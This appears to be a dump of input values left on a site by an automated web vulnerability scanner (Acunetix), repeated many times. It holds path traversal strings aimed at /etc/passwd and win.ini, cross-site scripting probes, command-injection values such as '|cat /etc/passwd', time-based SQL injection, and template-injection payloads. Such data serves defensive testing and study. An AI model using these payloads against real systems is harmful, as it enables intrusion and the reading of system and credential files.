.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"

1<input autofocus onfocus=prompt(999566)>

1

1

1

-1)

'

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1))

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

1

exEvvDjX'

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

http://hitvlD65p83ed.bxss.me/

1_20tuW <ScRiPt >prompt(925773)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

1

comments

L1RMtSqG')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

kLdssHdV'))

comments

'&dir&'

1

1

1

'"

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(985896)</ScRiPt>

comments/.

file:///etc/passwd

"&dir&"

1

1

1

1

1

1

<!--

'"()&%<ScRiPt >prompt(928806)</ScRiPt>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1_907185

1

WEB-INF/web.xml

1

"|dir

1

1

1

1

1

1

WEB-INF\web.xml

acu10928\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10928

1

1

1

1

1

1

acux2153\xc0\xbez1\xc0\xbcz2a\x90bcxuca2153

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(982654)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(986778)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(949934)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958084></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(928146)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(949740)">

1

response.write(9441409*9004331)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(904678)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9441409*9004331)+'

1<div style=width:expression(prompt(967024))>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

"+response.write(9441409*9004331)+"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<body onload=prompt(962132)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989748)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

1

cat /etc/passwd

1

-1

${99115+100413}

1

1<img src=xyz OnErRor=prompt(993048)>

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

WEB-INF\web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img/src=">" onerror=alert(971007)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n978079=v985913

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1<ScRiPt%20>prompt(992174)</sCripT>

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

!(()&&!|*|*|

testasp.vulnweb.com

1

NwdfdVMv'

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1

\xf6<img acu onmouseover=prompt(905052) //\xf6>

1

JO8pcwyM')

'

1

1

/etc/passwd

'"()

1<input autofocus onfocus=prompt(939962)>

1

1

JawskdWl'))

1

"

'

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

1

-1

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hit4QggVZWo4G.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

comments

1

-1)

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_T1SvF <ScRiPt >prompt(992998)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

1

&dir

1

1

-1))

1

http://www.acunetix.tst

1

comments/.

1

file:///etc/passwd

1

'&dir&'

'"

1

1

3RWLmxGu'

1'"()&%<ScRiPt >prompt(906290)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

"&dir&"

1

CGMXboZ4')

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(973455)</ScRiPt>

1

1

|dir

r9SyUBWI'))

1

1

1_998236

WEB-INF\web.xml

1

1

1

1

'|dir

acu7176\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7176

1

../../../../../../../../../../windows/win.ini

1

"|dir

acux4898\xc0\xbez1\xc0\xbcz2a\x90bcxuca4898

../../../../../../../../../../boot.ini

1

1

1

1

1<ScRiPt >prompt(955889)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(941994)</script>

1

1

1

1<ScRiPt >prompt(941386)</ScRiPt>

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965969></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(970223)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(936168)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9785105*9692873)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935650)"></g></svg>

1

1

1

1

'+response.write(9785105*9692873)+'

WEB-INF/web.xml

&cat /etc/passwd&

1

1<div style=width:expression(prompt(969932))>

1

1

"+response.write(9785105*9692873)+"

1

WEB-INF\web.xml

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(977416)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946294)>

SomeCustomInjectedHeader:injected_by_wvs

-1

1

`cat /etc/passwd`

1

1

1<img src=xyz OnErRor=prompt(964866)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

${100097+100093}

1

1

1<img/src=">" onerror=alert(958304)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

-1))

1

1

1<ScRiPt%20>prompt(900761)</sCripT>

1

CBMzXcBG'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n923270=v912017

1&lt

1

1

FJ5H6oxf')

testasp.vulnweb.com

1

'"()

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

ffMITSte'))

1

1

1

\xf6<img acu onmouseover=prompt(902219) //\xf6>

/etc/passwd

'

^(#$!@#$)(()))******

1

-1

1<input autofocus onfocus=prompt(943248)>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

'

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

-1))

"

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1_gd487 <ScRiPt >prompt(919555)</ScRiPt>

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

JjcHu6QF'

1

"&dir&"

http://hit2iIyMoGahB.bxss.me/

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

CF6FiYtC')

comments

|dir

1

1

1

1

1

1

'|dir

comments

QBqBWveq'))

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(901217)</ScRiPt>

'"

1

http://www.acunetix.tst

WEB-INF/web.xml

1

1

comments/.

"|dir

'"()&%<ScRiPt >prompt(978218)</ScRiPt>

1

WEB-INF\web.xml

<!--

1

1

1

1

1

1

1_977554

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu10580\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10580

1

1

1

acux8791\xc0\xbez1\xc0\xbcz2a\x90bcxuca8791

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(984926)</ScRiPt>

................windowswin.ini

1

1<script>prompt(995403)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(958997)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960033></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(946522)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(987855)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996404)"></g></svg>

response.write(9974820*9162618)

1

1<div style=width:expression(prompt(945355))>

1

WEB-INF/web.xml

1

1

'+response.write(9974820*9162618)+'

WEB-INF\web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(984209)>

1

../../../../../../../../../../etc/passwd

"+response.write(9974820*9162618)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928817)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(940226)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

-1

1

1<img/src=">" onerror=alert(962978)>

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99457+99171}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(957289)</sCripT>

1

|cat /etc/passwd#

-1)

1&n930373=v974412

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

-1))

'|'ld

1

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(921283) //\xf6>

"|"ld

sMC90SMd'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

xWSKi1C5')

'"()

1<input autofocus onfocus=prompt(921057)>

testasp.vulnweb.com

'

1

/etc/passwd

1

1

YHt4CXe7'))

1

<a href='http://www.acunetix.com'>website security</a>

'

1

"

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

"

[url=http://www.acunetix.com]website security[/url]

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1))

1_EnWxO <ScRiPt >prompt(962725)</ScRiPt>

||cat /etc/passwd

1

http://hitBIHVeeRboJ.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

eUK6Xvd2'

1

1

&dir

1

VA99V6sA')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

'&dir&'

file:///etc/passwd

http://www.acunetix.tst

6OG9luDD'))

1

1

1

comments/.

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

'"

1

1'"()&%<ScRiPt >prompt(944006)</ScRiPt>

1

1

1

1

<!--

WEB-INF/web.xml

|dir

1

1

'"()&%<ScRiPt >prompt(931125)</ScRiPt>

'|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1_910363

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu3698\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3698

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux8057\xc0\xbez1\xc0\xbcz2a\x90bcxuca8057

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(986992)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(951152)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(907278)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965809></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(991964)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9010967*9219237)

1

1<video><source onerror="javascript:prompt(960359)">

1

'+response.write(9010967*9219237)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987050)"></g></svg>

1

&cat /etc/passwd&

"+response.write(9010967*9219237)+"

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(908184))>

1

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

1

${100013+99707}

1<body onload=prompt(919804)>

cat /etc/passwd

1

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n920052=v982996

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983161)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

)

1<img src=xyz OnErRor=prompt(998881)>

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

1

1<img/src=">" onerror=alert(993074)>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

'"()

1<ScRiPt%20>prompt(949092)</sCripT>

RDqiNxh8'

testasp.vulnweb.com

"|"ld

'

1

/etc/passwd

1

HaRNZK7o')

1

1

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

OM3z4BRL'))

'

1

1

\xf6<img acu onmouseover=prompt(964557) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

http://hitq9j1UjcfET.bxss.me/

1<input autofocus onfocus=prompt(906673)>

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

-1)

1

1

acunetix_wvs_invalid_filename

1

<a href='http://www.acunetix.com'>website security</a>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

-1))

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

1

comments

1

1

uGdCJXvN'

1

'&dir&'

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(910839)</ScRiPt>

comments

'"

1_W6tSH <ScRiPt >prompt(927836)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

jVJ7zIm5')

1

'"()&%<ScRiPt >prompt(984537)</ScRiPt>

1

<!--

1

comments/.

WEB-INF/web.xml

1

1_948417

oVXnY6qC'))

|dir

1

WEB-INF\web.xml

1

1

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu1277\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1277

1

../../../../../../../../../../boot.ini

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

acux7313\xc0\xbez1\xc0\xbcz2a\x90bcxuca7313

1

1

1

1

1

1<ScRiPt >prompt(921355)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1<script>prompt(961157)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(902261)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935864></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(962388)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(950529)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922669)"></g></svg>

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(924541))>

1

1

WEB-INF\web.xml

1<iframe src='data:text/html

response.write(9473058*9606571)

1

1

1

1

1

'+response.write(9473058*9606571)+'

1<body onload=prompt(930610)>

&cat /etc/passwd&

1

1

"+response.write(9473058*9606571)+"

1

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(940983)>

1

1

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(17.314),0)/*'XOR(if(now()=sysdate(),sleep(17.314),0))OR'"XOR(if(now()=sysdate(),sleep(17.314),0))OR"*/

1

1

1

1<img src=xyz OnErRor=prompt(900967)>

(select(0)from(select(sleep(17.314)))v)/*'+(select(0)from(select(sleep(17.314)))v)+'"+(select(0)from(select(sleep(17.314)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(955195)>

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1)

1

1<ScRiPt%20>prompt(988467)</sCripT>

SomeCustomInjectedHeader:injected_by_wvs

-1))

1

../../../../../../../../../../etc/passwd.jpg

${99530+99124}

1

|cat /etc/passwd#

1

1&lt

1

NnF8FdL9'

1

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(941961) //\xf6>

1

bWjvfP12')

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n926774=v947468

1<input autofocus onfocus=prompt(928561)>

1

"|"ld

1

wIHpXAgR'))

1

1some_inexistent_file_with_long_name%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

1

)

-1)

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

!(()&&!|*|*|

1

-1))

'"()

testasp.vulnweb.com

1_aLcYI <ScRiPt >prompt(967307)</ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

taCdeE2i'

1

^(#$!@#$)(()))******

1

'

/etc/passwd

||cat /etc/passwd

1

1

Ff3lI9WS')

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

lpO3uxtw'))

1

&dir

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hittXtONx7iPY.bxss.me/

1

1

1

1

1

"&dir&"

1

1

acunetix_wvs_invalid_filename

1

1

1

|dir

http://www.acunetix.tst

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

comments

'"

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

comments

1'"()&%<ScRiPt >prompt(957582)</ScRiPt>

1

<!--

1

1

WEB-INF/web.xml

1

comments/.

1

1

'"()&%<ScRiPt >prompt(916411)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1_928971

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu1738\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1738

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2488\xc0\xbez1\xc0\xbcz2a\x90bcxuca2488

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(922843)</ScRiPt>

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(920934)</script>

1

1<ScRiPt >prompt(905437)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959828></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(947055)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

response.write(9854215*9370817)

1<video><source onerror="javascript:prompt(993014)">

1

1

'+response.write(9854215*9370817)+'

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989126)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9854215*9370817)+"

WEB-INF/web.xml

1<div style=width:expression(prompt(911739))>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

cat /etc/passwd

WEB-INF\web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1<body onload=prompt(967997)>

1

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99792+99289}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951099)>

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=xyz OnErRor=prompt(908753)>

1&n932553=v985848

1

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

